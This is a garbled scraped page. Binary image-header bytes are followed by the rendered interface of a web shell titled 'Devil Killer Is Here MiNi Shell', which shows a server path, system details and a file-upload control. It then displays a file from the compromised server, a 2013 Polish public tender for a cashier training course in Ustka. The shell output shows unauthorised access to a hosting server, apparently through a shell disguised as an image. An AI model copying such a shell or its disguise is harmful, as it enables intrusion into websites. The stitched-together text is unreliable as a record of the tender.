JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131211/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131211/269323-N-2013.html

<p class="kh_header"><b>Ustka: Szkolenie pn. Sprzedawca z obsługą kasy fiskalnej, w ramach projektu systemowego pn. Ty też możesz -  Zadanie 1. Aktywna integracja</b><br>
<b>Numer ogłoszenia: 269323 - 2013; data zamieszczenia: 11.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek  Pomocy Społecznej , Dunina 24, 76-270 Ustka, woj. pomorskie, tel. 59 8147 197, faks 59 8147 197.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gops.ustka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie pn. Sprzedawca z obsługą kasy fiskalnej, w ramach projektu systemowego pn. Ty też możesz -  Zadanie 1. Aktywna integracja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia: 
Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia pn. Sprzedawca z obsługą kasy fiskalnej, w ramach projektu systemowego pn. Ty też możesz -  Zadanie 1. Aktywna integracja. Projekt jest realizowany przez Gminny Ośrodek Pomocy Społecznej w Ustce w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013,  Działanie 7.1., Poddziałanie 7.1.1., współfinansowany ze środków Unii  Europejskiej w ramach  Europejskiego  Funduszu  Społecznego.
Grupy docelowe - odbiorcy usługi:
Ilość osób:  8  - uczestnicy i uczestniczki projektu. 
Grupa  8  osób ( kobiet  i  mężczyzn, w tym osoby niepełnosprawne). 
Cel główny projektu:
Celem głównym projektu jest aktywizacja  społeczno - zawodowa grupy 47 osób (35 kobiet i 12 mężczyzn), w tym 8 kobiet  niepełnosprawnych  i  5 mężczyzn niepełnosprawnych  zagrożonych wykluczeniem  społecznym z terenu Gminy Ustka w latach 2012 - 2014
Cel i program szkolenia: 
Celem szkolenia jest nabycie wiadomości, umiejętności oraz przygotowanie uczestnika projektu z zakresu wiedzy teoretycznej i praktycznej do wykonywania zawodu na stanowisku  sprzedawca z obsługą kasy fiskalnej.    
Program szkolenia musi określać: 
1) nazwę szkolenia, 
2) czas trwania i  sposób organizacji szkolenia,  ilość  godzin teoretycznych i  praktycznych,
3) miejsce szkolenia,
4) szczegółowy rozkład treści  nauczania  w  zakresie  poszczególnych  zajęć  edukacyjnych wraz z określeniem liczby godzin, 
5) wykaz literatury,
6) wykaz materiałów szkoleniowych dla uczestników szkolenia, w tym segregator A4, wkład do segregatora - 100 kartek A4 w kratkę, dwa długopisy, kalkulator, skrypt w wersji drukowanej (papierowej) sporządzony i opracowany przez Wykonawcę lub Wykładowcę/-ów na potrzeby szkolenia, zawierający najważniejsze informacje z prowadzonego szkolenia. Skrypt nie może mieć formy kserokopii, nie może zawierać wydruków lub kserokopii książek. (Zamawiający zastrzega, iż  skrypt nie może być zapisany na nośniku elektronicznym.), 
7) wykaz materiałów dydaktycznych, 
8) sposób sprawdzania efektów szkolenia,
9) całkowity koszt szkolenia.  
Materiały szkoleniowe po zakończeniu zajęć przechodzą na własność uczestników  szkolenia.
Program szkolenia musi obejmować co najmniej następujące zagadnienia:
1. Zagadnienia ogólne:  
a) Podstawy obsługi komputera: Microsoft Windows, Microsoft Word, Microsoft Excel - 40 godzin zajęć. Wykonawca zobowiązany będzie zapewnić każdemu uczestnikowi szkolenia przenośny komputer (Laptop) na czas trwania zajęć. 1 laptop dla jednego uczestnika.
b) Przepisy BHP i PPOŻ w obiektach handlowych.
c) Minimum sanitarne.
d) System HACCP w obiektach handlowych. 
e) Organizacja stanowiska pracy.
f) Przepisy prawne związane z zawodem sprzedawcy.
g) Elementy towaroznawstwa handlowego.
h) Obsługa klienta.
i) Podstawowe techniki sprzedaży.
j) Zwiększanie skuteczności sprzedaży.
k) Najczęściej popełniane błędy przez sprzedawców.
l) Obsługa kasy fiskalnej w praktyce. Wykonawca zapewni każdemu uczestnikowi szkolenia kasę fiskalną na czas trwania zajęć z obsługi kasy fiskalnej. 1 kasa fiskalna dla jednego uczestnika.
m) Obsługa metkownicy i wagi elektronicznej w praktyce.
n) Gospodarka magazynowa.
o) Fakturowanie w praktyce.
p) Obsługa komputerowego programu do fakturowania i gospodarki magazynowej, powszechnie stosowanego - w praktyce.  Wykonawca zobowiązany będzie zapewnić każdemu uczestnikowi szkolenia przenośny komputer (Laptop) na czas trwania zajęć. 1 laptop dla jednego uczestnika..
Zajęcia teoretyczne muszą opierać się m.in. na prezentacjach multimedialnych. 
Czas realizacji szkolenia:
1) Łączna liczba godzin realizacji szkolenia: 160 godzin (godziny zegarowe = 60 min.), w tym co najmniej 110  godzin zajęć praktycznych. 
2) Termin realizacji szkolenia: od dnia podpisania umowy do dnia 06.03.2014r. (szkolenie musi zakończyć się dnia 06.03.2014r.), w dni robocze od poniedziałku do piątku.  Maksymalnie 8  godzin szkolenia dziennie.  Sugerowane godziny: od 8.00  do 16.00. 
 Miejsce realizacji szkolenia:
1)  Miejsce  realizacji  szkolenia: miejscowość Gąbino na terenie Gminy Ustka  - dokładny adres miejsca realizacji zajęć, Wykonawca wskaże w szczegółowym harmonogramie zajęć.
Obowiązki organizacyjne Wykonawcy:
1) Zapewnienie uczestnikom na czas trwania szkolenia sali szkoleniowej w miejscowości  Gąbino na terenie Gminy Ustka, przystosowanej do realizacji zajęć w ramach szkolenia. Zajęcia muszą być prowadzone w odpowiednio przygotowanej i wyposażonej sali/pracowni, dostosowanej do potrzeb szkolenia. 
2) Sala szkoleniowa musi spełniać co najmniej następujące wymogi:
- jest dostosowana do swobodnego pomieszczenia grupy 8 osób  +  wykładowca,
- posiada zaplecze sanitarne,
- ma zapewnione ogrzewanie przy spadku temperatury zewnętrznej poniżej 12stopni C, minimum
20stopni C,
- posiada wydzielone miejsce na przygotowanie poczęstunku i ciepłych napojów, 
- posiada sprawny, działający czajnik elektryczny,  
- posiada odpowiednie oświetlenie,
- posiada minimum 5 stołów i 10 krzeseł,
- dot. zajęć praktycznych: posiada wyposażenie techniczne niezbędne do realizacji zajęć w ramach szkolenia. (W celu prawidłowej realizacji zajęć praktycznych, każdy uczestnik musi mieć swobodny dostęp, możliwość korzystania i pracy na urządzeniach, materiałach zapewnionych przez Wykonawcę na potrzeby szkolenia.)
3) Zapewnienie   odpowiednich    warunków   bezpieczeństwa   i   higieny   pracy   zgodnie  z obowiązującymi w polskim prawie regulacjami. 
4) Zapewnienie wszystkim  uczestnikom  szkolenia  ciepłego  posiłku  (obiadu składającego  się      
z  drugiego dania o wartości co  najmniej  16 zł.  brutto  na  1 osobę)  w  każdym  dniu  realizacji  szkolenia.  Jeden posiłek dla każdego uczestnika szkolenia w każdym dniu realizacji szkolenia.
5) Wydania każdemu uczestnikowi szkolenia aktualnych materiałów szkoleniowych (w tym materiałów szkoleniowych określonych przez Zamawiającego w SIWZ) - 1 zestaw materiałów szkoleniowych dla 1 uczestnika - na początku realizacji szkolenia. 
6) Zapewnienie każdemu uczestnikowi szkolenia materiałów dydaktycznych, sprzętu niezbędnego do przeprowadzenia zajęć na czas trwania szkolenia.  
7) Wykonawca zapewni profesjonalnych wykładowców posiadających doświadczenie   i kwalifikacje upoważniające do prowadzenia zajęć w przedmiotowym zakresie. Wszystkie zajęcia muszą być przeprowadzone przez wykładowców posiadających  kwalifikacje w przedmiotowym zakresie.
8) Wykonawca obejmie wszystkich uczestników szkolenia ubezpieczeniem od następstw nieszczęśliwych wypadków powstałych w czasie szkolenia oraz w drodze do miejsca realizacji szkolenia i z powrotem, na czas trwania zajęć, w wysokości co najmniej 10.000,00 zł.  brutto  na 1  osobę.
9) Wykonawca zobowiązany będzie do bezzwłocznego informowania Zamawiającego  o  przypadkach  nieobecności  uczestników  na  zajęciach.
10) Wykonawca przeprowadzi ewaluację szkolenia - dokona oceny szkolenia za pomocą ankiet ewaluacyjnych opracowanych przez Wykonawcę  na zakończenie zajęć oraz sporządzi ich analizę - wśród wszystkich uczestników szkolenia. 
11) Wykonawca wyda każdemu uczestnikowi szkolenia  oryginał  zaświadczenia  lub certyfikatu,
potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji w przedmiotowym zakresie przez uczestnika szkolenia, 
- zawierającego co najmniej: imię i nazwisko uczestnika, datę wystawienia, temat szkolenia, wymiar godzin szkolenia, podpis osoby upoważnionej do wystawiania zaświadczeń/certyfikatów, dwa podstawowe logotypy:  logo Programu Operacyjnego Kapitał Ludzki oraz logotyp Unii Europejskiej z odwołaniem słownym do Unii Europejskiej  i Europejskiego Funduszu Społecznego oraz informacją o realizowaniu szkolenia współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu  Operacyjnego Kapitał Ludzki  2007 - 2013.
Wzór zaświadczenia lub certyfikatu Wykonawca przedłoży Zamawiającemu jako  załącznik do oferty.
12) Wykonawca zobowiązany będzie do prowadzenia na bieżąco, w każdym dniu realizacji szkolenia listy obecności uczestników. 
13) Prowadzenia na bieżąco dziennika zajęć zawierającego co najmniej: daty, tematy zajęć,  liczbę godzin szkolenia wraz z podpisami wykładowcy/ów - w każdym dniu realizacji szkolenia.
14) Prowadzenia na bieżąco  listy  odbioru  posiłku  i  poczęstunku  przez  uczestników  szkolenia - w każdym dniu realizacji szkolenia. 
15) Sporządzenia listy potwierdzającej odbiór materiałów szkoleniowych przez uczestników szkolenia.  
16) Sporządzenia listy potwierdzającej odbiór zaświadczeń lub certyfikatów przez uczestników szkolenia. 
17) Wykonawca zapewni transport 1 uczestnikowi szkolenia z miejsca zamieszkania do miejsca realizacji szkolenia i z powrotem.  Dowóz 1 osoby z miejscowości Rowy do miejsca realizacji szkolenia i z powrotem - w każdym dniu realizacji szkolenia. Zamawiający zastrzega sobie prawo do zmiany ilości osób, którym zostanie zapewniony transport oraz miejscowości w obrębie Gminy Ustka. 
18) Sporządzenia sprawozdania końcowego z wykonania przedmiotu umowy, po zakończeniu realizacji zajęć, zawierającego m.in. opis poszczególnych działań w ramach szkolenia.  
19) Wykonawca przeprowadzi egzamin wewnętrzny wśród wszystkich uczestników szkolenia na zakończenie zajęć oraz sporządzi protokół z egzaminu w formie pisemnej.
20) Wykonawca oznaczy w sposób widoczny i czytelny pomieszczenia, w których będą odbywały się zajęcia logiem Programu Operacyjnego Kapitał Ludzki oraz logotypem Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego i informacją o realizowaniu szkolenia współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego  Kapitał  Ludzki  2007 - 2013. 
21) Wykonawca poinformuje uczestników szkolenia przed rozpoczęciem zajęć o współfinansowaniu zajęć ze środków UE w ramach EFS.
22) Oznaczenia logiem Programu Operacyjnego Kapitał Ludzki oraz logotypem Unii Europejskiej z odwołaniem słownym do Unii Europejskiej i Europejskiego Funduszu Społecznego i informacją o realizowaniu szkolenia współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego zgodnie z wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego  Kapitał  Ludzki 2007 - 2013 wszelkich dokumentów związanych z realizacją przedmiotu zamówienia, w tym materiałów szkoleniowych (segregator A4, kalkulator, skrypt w wersji drukowanej  -  papierowej). 
23) Wykonawca opracuje szczegółowy harmonogram zajęć, zawierający co najmniej: daty, godziny zajęć, miejsce realizacji szkolenia, który należy przedłożyć Zamawiającemu w terminie 5 dni przed dniem podpisania umowy,  jako załącznik do umowy.  
24) Przestrzegania w ramach umowy, ustawy z dnia 29 sierpnia 1997r. o ochronie danych osobowych  Dz. U. z  2002r.  Nr 101,  poz. 926 ze zm.  
25) Przechowania dokumentacji związanej z realizacją przedmiotu zamówienia co najmniej do dnia 31.12.2020r., w sposób zapewniający dostępność, poufność i bezpieczeństwo. 
Zamawiający zastrzega sobie prawo:
1) Zamawiający zastrzega sobie prawo wglądu do dokumentów Wykonawcy  związanych z realizacją przedmiotu zamówienia, w tym dokumentów finansowych i dokumentów elektronicznych. Wykonawca podda się kontroli podmiotom uprawnionym do przeprowadzania kontroli zadań realizowanych w ramach  projektów PO KL  współfinansowanych  ze środków Unii  Europejskiej w ramach EFS.
2) Zamawiający zastrzega sobie prawo dokonywania niezapowiedzianych kontroli z realizacji  przedmiotu zamówienia, kontroli  frekwencji  uczestników szkolenia oraz  sposobu  prowadzenia  zajęć.
Wykonawca nie może powierzyć wykonania przedmiotu umowy innym podwykonawcom.
Wykonawca zobowiązuje się do:
Przekazania Zamawiającemu w terminie do pięciu dni roboczych od daty zakończenia realizacji przedmiotu umowy pełnej dokumentacji szkoleniowej, obejmującej:
1) kopie zaświadczeń lub certyfikatów potwierdzających ukończenie szkolenia przez uczestników projektu,
2) listy obecności uczestników,
3) dziennik zajęć, 
4) listy potwierdzające odbiór posiłku i poczęstunku przez uczestników szkolenia,
5) listę  potwierdzającą  odbiór  materiałów  szkoleniowych  przez uczestników zajęć,
6) listę potwierdzającą odbiór zaświadczeń lub certyfikatów przez uczestników zajęć,
7) sprawozdanie końcowe z wykonania przedmiotu umowy,   
8) protokół potwierdzający przeprowadzenie egzaminu wewnętrznego,  
9) ankiety ewaluacyjne wraz ze sporządzoną ich analizą, 
10) 1 komplet materiałów szkoleniowych określony w SIWZ - w tym segregator A4, wkład do segregatora - 100 kartek A4 w kratkę, dwa długopisy, kalkulator,  skrypt w wersji drukowanej (papierowej) sporządzony i opracowany przez Wykonawcę lub Wykładowcę/-ów na potrzeby szkolenia, zawierający najważniejsze informacje z prowadzonego szkolenia. Skrypt nie może mieć formy kserokopii, nie może zawierać wydruków lub kserokopii książek. (Zamawiający zastrzega, iż  skrypt nie może być zapisany na nośniku elektronicznym.). 
Wszelkie analizy, sprawozdania, itp. muszą zawierać czytelne podpisy osób sporządzających dokument.  W przypadku kserokopii dokumentu - dokument musi zostać potwierdzony za zgodność z oryginałem.  
Wszelkie listy obecności, odbioru materiałów szkoleniowych itp., muszą zawierać czytelne podpisy uczestników..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.03.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca przedstawi dokumenty potwierdzające posiadanie aktualnego wpisu (na 2013 rok) do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę Wykonawcy.
Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie dokonana według formuły spełnia - nie spełnia w oparciu o załączone do oferty oświadczenia i dokumenty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przedstawionych powyżej warunków udziału w postępowaniu zostanie  dokonana według formuły spełnia - nie spełnia w oparciu o załączone do oferty oświadczenia i dokumenty
Warunek ten zostanie spełniony,  jeżeli  Wykonawca  wykaże, że dysponuje:
- do prowadzenia zajęć teoretycznych oraz praktycznych z obsługi komputera - co najmniej jedną osobą posiadającą minimum wykształcenie wyższe  oraz doświadczenie w przeprowadzeniu co najmniej dwóch usług szkoleniowych, polegających na przeszkoleniu grupy szkoleniowej składającej się z minimum 5 osób w zakresie obsługi komputera;
- do prowadzenia zajęć teoretycznych - co najmniej jedną osobą posiadającą wykształcenie wyższe oraz posiadającą doświadczenie w przeprowadzeniu co najmniej dwóch usług szkoleniowych, polegających na przeprowadzeniu zajęć teoretycznych dot. przeszkolenia grupy szkoleniowej składającej się z minimum 5 osób w zakresie sprzedawca. 
- do prowadzenia zajęć praktycznych - co najmniej jedną osobą posiadającą  wykształcenie wyższe oraz doświadczenie w przeprowadzeniu co najmniej dwóch usług szkoleniowych, polegających na przeprowadzeniu zajęć praktycznych  dot. przeszkolenia grupy szkoleniowej składającej się z minimum 5 osób w zakresie sprzedawca, obsługa kasy fiskalnej;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty przygotowany zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ,
2. oświadczenia i dokumenty wyszczególnione w punkcie 8 SIWZ,
3. w przypadku działania Wykonawcy przez pełnomocnika, należy dołączyć do oferty pełnomocnictwo w oryginale lub jego kopię poświadczoną notarialnie;
4. w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia     pełnomocnictwo do reprezentowania  tychże  wykonawców,  zgodnie  z  pkt. 9 SIWZ.
5. w przypadku gdy Wykonawca będzie polegać na  osobach zdolnych do wykonania   zamówienia lub innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków - w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
6. program szkolenia opracowany  zgodnie z  postanowieniami  określonymi  w  SIWZ;
7. wzór zaświadczenia lub certyfikatu potwierdzającego ukończenie szkolenia przez uczestnika / uczestniczkę projektu,  zgodnie z postanowieniami  określonymi w SIWZ.
8. dokumenty potwierdzające posiadanie aktualnego wpisu (na 2013 rok) do rejestru instytucji szkoleniowych, prowadzonego przez Wojewódzki Urząd Pracy, właściwy ze względu na siedzibę Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia 	zmian do treści zawartej umowy w zakresie:
1. Terminu realizacji zamówienia może ulec zmianie w sytuacji :
- wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia  niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiły po dniu wejścia w życie umowy, w szczególności: klęski żywiołowej, strajki oraz akty władzy i administracji publicznej,
2. Inne możliwe zmiany w postanowieniach umowy :
- zmiany wykładowców realizujących przedmiot zamówienia, wymienionych w ofercie, przy czym nowo wskazana osoba powinna spełniać wymagania określone przez Zamawiającego  w pkt. 7.1.3 SIWZ i uzyskać akceptację Zamawiającego. 
Warunki zmian:
a) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
b) zgoda obu stron umowy,
c) uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, zapewnienie  optymalnych parametrów jakościowych usługi.
